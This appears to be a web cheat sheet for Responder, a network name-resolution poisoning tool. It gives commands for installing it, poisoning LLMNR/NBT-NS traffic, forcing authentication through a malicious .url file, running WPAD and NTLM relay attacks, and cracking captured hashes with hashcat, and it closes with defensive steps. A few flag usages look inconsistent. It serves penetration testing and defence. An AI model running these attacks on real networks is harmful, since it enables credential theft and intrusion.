Appearance
Responder Cheat Sheet
Overview
Responder is a powerful LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service), and MDNS (Multicast DNS) poisoner. It's designed to respond to specific network name resolution queries and includes built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers supporting NTLMv1/NTLMv2/LMv2 authentication.
⚠️ Warning: Responder is a security testing tool that should only be used in environments where you have explicit permission to do so.
Installation
Kali Linux
bash
# Update package list
sudo apt update
# Install if not already installed
sudo apt install responderFrom GitHub
bash
# Clone the repository
git clone https://github.com/lgandx/Responder
# Navigate to the directory
cd Responder
# Make the Python script executable
chmod +x Responder.pyUsing pip
bash
# Install using pip
pip install ResponderBasic Usage
Starting Responder
bash
# Basic usage with interface specification
responder -I eth0
# Start with all options enabled
responder -I eth0 -wrf
# Analyze mode (passive)
responder -I eth0 -ACommand Line Options
| Option | Description |
|---|---|
-h, --help | Show help message and exit |
-A, --analyze | Analyze mode. Do not poison any requests, just analyze traffic |
-I <interface> | Network interface to use |
-i <IP> | IP address to bind to |
-e <IP> | External IP address (for DHCP options) |
-b, --basic | Return a Basic HTTP authentication. Default: NTLM |
-r, --wredir | Enable answers for netbios wredir suffix queries |
-d, --NBTNSdomain | Enable answers for netbios domain suffix queries |
-f, --fingerprint | Fingerprint hosts that issued an NBT-NS or LLMNR query |
-w, --wpad | Start the WPAD rogue proxy server |
-u, --upstream-proxy | Upstream HTTP proxy used by the rogue WPAD proxy |
-F, --ForceWpadAuth | Force NTLM/Basic authentication on wpad.dat file retrieval |
-P, --ProxyAuth | Force NTLM/Basic authentication for any proxy request |
-lm, --LM | Force LM hashing downgrade for Windows XP/2003 and earlier |
-v, --verbose | Increase verbosity |
--log-local | Log to file in addition to console |
-s, --disable-syslog | Do not log to syslog |
-S, --disable-stdout | Do not log to stdout |
-c, --config | Path to configuration file |
--server=SERVER | Enable/disable specific server (HTTP, SMB, etc.) |
--sql | Enable the MSSQL server |
--mssql | Enable the MSSQL server |
--https | Enable the HTTPS server |
--http | Enable the HTTP server |
--smb | Enable the SMB server |
--ftp | Enable the FTP server |
--imap | Enable the IMAP server |
--pop | Enable the POP server |
--smtp | Enable the SMTP server |
--ldap | Enable the LDAP server |
--dns | Enable the DNS server |
Configuration File
The configuration file is located at /etc/responder/Responder.conf or in the Responder directory as Responder.conf.
Key Configuration Options
ini
[Responder Core]
; Set to On or Off to enable or disable features
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = OnAttack Scenarios
Basic LLMNR/NBT-NS Poisoning
bash
# Start Responder with default settings
responder -I eth0 -v
# Wait for authentication attempts
# Hashes will be saved in the logs directoryForced Authentication via UNC Path
bash
# Create a file with a UNC path
echo "file://<non-existent-share>/test.txt" > malicious.url
# Start Responder
responder -I eth0 -v
# When the victim opens the file, their system will attempt to authenticate
# Responder will capture the hashWPAD Attack
bash
# Start Responder with WPAD enabled
responder -I eth0 -w -v
# When a victim's browser requests a WPAD configuration file
# Responder will respond and capture authentication attemptsRelay Attack Setup
bash
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run ntlmrelayx
ntlmrelayx.py -t <target_ip> -smb2supportHash Capture and Cracking
Viewing Captured Hashes
bash
# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt
# Format of captured hash
# USERNAME::DOMAIN:challenge:NTLM response:other dataCracking with Hashcat
bash
# Crack NTLMv2 hashes with hashcat
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt /path/to/wordlist
# Crack NTLMv1 hashes with hashcat
hashcat -m 5500 /usr/share/responder/logs/SMB-NTLMv1-SSP-<IP>.txt /path/to/wordlistAdvanced Techniques
Using Responder with MultiRelay
bash
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run MultiRelay
cd Responder/tools
python3 MultiRelay.py -t <target_ip> -u ALLPoisoning Specific Hosts
bash
# Create a file with target IPs
echo "192.168.1.10" > targets.txt
# Start Responder with target file
responder -I eth0 -v -e targets.txtCustom Challenge Value
bash
# Edit Responder.conf and set a custom challenge
# [Responder Core]
# Challenge = 1122334455667788Defensive Measures
Disabling LLMNR via Group Policy
- Open Group Policy Editor
- Navigate to Computer Configuration > Administrative Templates > Network > DNS Client
- Enable "Turn off multicast name resolution"
Disabling NBT-NS via Command Line
bash
# Disable NBT-NS on Windows
netsh interface ipv4 set interface "Local Area Connection" nbtbios=disabledDisabling NBT-NS via Registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\NodeType = 2 (P-node)Detecting Responder Activity
bash
# Monitor for suspicious LLMNR/NBT-NS responses
# Look for multiple services running on the same IP
# Check for unusual authentication attemptsTroubleshooting
Common Issues
Port Conflicts
bash# Check if ports are already in use netstat -tuln | grep -E '445|80|53' # Kill conflicting processes sudo kill <PID>Interface Not Found
bash# List available interfaces ip a # Use the correct interface name responder -I <correct_interface>Permission Issues
bash# Run with sudo sudo responder -I eth0No Hashes Captured
bash# Check if Responder is running in analyze mode # Ensure the network allows the required traffic # Try forcing authentication with UNC paths
Resources
This cheat sheet provides a comprehensive reference for using Responder in security testing scenarios. Always ensure you have proper authorization before using this tool in any environment.